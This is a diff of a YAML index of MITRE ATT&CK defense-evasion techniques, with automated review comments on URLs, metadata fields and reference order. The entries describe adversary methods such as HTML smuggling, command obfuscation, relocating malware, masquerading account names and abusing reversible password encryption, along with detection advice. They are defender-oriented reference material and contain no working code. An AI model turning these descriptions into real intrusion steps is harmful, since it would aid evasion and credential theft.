+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
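Review bot: the two Burke/CISA reference URLs in the new T1127.002 object carry analytics tracking parameters (?_gl=...&_ga=...) that should be stripped to the bare PDF path before this lands in the index, and the author is given as "William J. Burke IV" in one entry and "William Joseph Burke III" in the other; if this is copied verbatim from upstream, that is where the fix belongs, but tracker-laden URLs should not be propagated. Both new sub-techniques (T1127.002 and T1070.010) also arrive with x_mitre_detection: '' and atomic_tests: [], so they add index coverage but no detection guidance or tests yet; the data sources they list (Process Creation, Command Execution, Module Load, File Modification) are the starting point a detection author would work from.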
@@ -11762,10 +12018,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -11802,40 +12057,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11844,20 +12069,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
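Review bot: the Mandiant M-Trends 2020 reference URL changes from content.fireeye.com to www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf, a real link change buried inside what is otherwise a key reorder of the T1578.002 object; it is easy to miss in a diff this size and deserves a mention in the commit message. The x_mitre_permissions_required: - User removal here matches the one for T1027.004 above, and the new contributor line and version bump to '1.2' are consistent with each other.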
@@ -11887,7 +12142,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -11930,8 +12185,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
@@ -11978,7 +12231,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -12044,12 +12297,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
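Review bot: x_mitre_permissions_required: - Administrator is kept for T1601.001 in this hunk while the same field is removed from T1027.004 and T1578.002 elsewhere in the patch; if the field has been retired in the upstream spec the generator should drop it uniformly, and if it is still valid the other removals deserve a second look.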
@@ -12104,33 +12355,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
+ T1036.010:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
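Review bot: the quoted description for the new T1036.010 entry keeps upstream's escaped whitespace verbatim (the `\ \n\n` at the start of the last paragraph and a space before the closing quote after `account names.`); if the index generator normalises description strings anywhere, it should do so here as well, otherwise this is raw STIX text and can stay. Its `x_mitre_platforms` list also introduces `Office Suite` and `Identity Provider`, which no other entry in this section uses, so any per-platform index derived from this file has to be regenerated together with it.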
@@ -12151,6 +12453,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -12165,22 +12468,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
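Review bot: `x_mitre_permissions_required: Administrator` is dropped from T1556.001 here (the same field goes from T1556.005 further down) while other entries in this same file still carry it, for example T1221 and Hidden File System; if anything downstream reads that field, confirm the inconsistency comes from the upstream bundle and is not a generator regression. The T1027.006 `modified` bump at the end of the hunk is fine.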
@@ -12238,48 +12561,17 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests: []
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
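Review bot: the replacement nccgroup URL slug reads `internet-exploreredge`, with the hyphen between `explorer` and `edge` gone; confirm it resolves before merging, since the old research.nccgroup.com path is removed in the same hunk and a retrieval date of September 12, 2024 is asserted for the new one.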
@@ -12301,6 +12593,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -12311,23 +12604,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
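Review bot: the external_references for T1556.005 come back in a different order (`dump_pwd_dcsync` moves from last to first) even though their content is unchanged, and the T1027.010 entry after it is only touched for its `modified` timestamp; reference order is whatever the bundle supplies, but if the generator can sort references by `source_name`, this kind of relocation would stop appearing as churn on every refresh.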
@@ -12368,8 +12688,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
@@ -12405,43 +12726,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
